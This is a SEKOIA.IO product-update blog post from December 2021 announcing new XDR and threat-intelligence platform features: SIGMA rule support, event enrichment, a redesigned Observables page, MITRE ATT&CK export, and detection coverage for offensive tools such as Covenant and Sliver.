SIGMA, design and MITRE ATT&CK… new features of the XDR and CTI platform

Dec 3, 2021

SEKOIA.IO aims to be as close as possible to the users of the platform, meeting their needs in a precise way, while taking into account their approach and user experience. In this dynamic, the platform continues to reinvent itself and evolve by regularly integrating new features while improving existing features. Discover in this article, all the news published in December 2021.

SIGMA for the new detection workflow

Improved detection, choose the SIGMA detection language to facilitate the setup of your custom rules!

SEKOIA.IO’s detection workflow was historically based on the STIX patterning format, today we include SIGMA support to:

  • Facilitate the writing of detection rules by automatically generating a rule in SIGMA format when selecting the desired fields in the “Details” tab of an event.
  • Simplify the reading, understanding and writing of SIGMA rules, a more common and unified detection language.
  • Write detection rules based on the same data model as the events, which remains the ECS.
  • Ensure more stability and performance at the detection level.

Generate your rules now!

Faster investigation, use the assets created in SEKOIA.IO to enrich the events!

To make your investigations easier and more efficient, the new enrichment feature will allow you to have more context in your events thanks to the different assets created in SEKOIA.IO.

Tags associated with known observables in the Intelligence Center will also be available to provide more information on different attributes for a better understanding of the event.

Navigate easily through all the events related to the same asset!

The Observables page is getting a makeover

Not only a new design, but also more features!

As you already know, observables complete your IoC-based investigation. We’ve linked the two!  You can see which threats are related to an observable by viewing its relationships in the “Related Threats” tab.

To make it even easier to use them, you now have the option to:

  • Filter observables by type, tag and source.
  • Copy information related to observables such as ID or name in a single click.
  • View or copy to an observable’s JSON file more quickly.
  • Find threats associated with observables through the “Related Threats” tab to be redirected to the Intelligence page for maximum context.

Speed up your triage process by consulting the Observables!

Export relationships in MITRE ATT&CK format

In addition to CSV and JSON Lines, you can now export relationships in MITRE ATT&CK format. You can select one or more object types, or export them all in the format you prefer. 

Export the relationships that interest you now!

We detect offensive security tools

Thanks to the new trackers and detection rules deployed this month, SEKOIA.IO has improved our system and network detection coverage of offensive tools like Covenant, Koadic and Sliver.

Two FLINT reports have also been published detailing how Covenant and Sliver work, and how they are used by cybercriminals and APTs.

A continuous improvement of our CTI base

An update of our Hatching Triage playbook has allowed our analysts to add to our CTI database the hashes of the last 6 months and samples related to 35 families of malware and ransomware.

This playbook is also run automatically on a daily basis to retrieve and integrate into SEKOIA.IO the hash and malware/ransomware configuration of the latest samples published on the Triage sandbox.

Chat with our team!

Would you like to know more about our solutions? Do you want to discover our XDR and CTI products? Do you have a cyber security project in your organization? Make an appointment and meet us!

Échangez avec l’équipe

Vous souhaitez en savoir plus sur nos solutions de protection ? Vous voulez découvrir nos produits de XDR et de CTI ? Vous avez un projet de cybersécurité dans votre organisation ? Prenez rendez-vous et rencontrons-nous !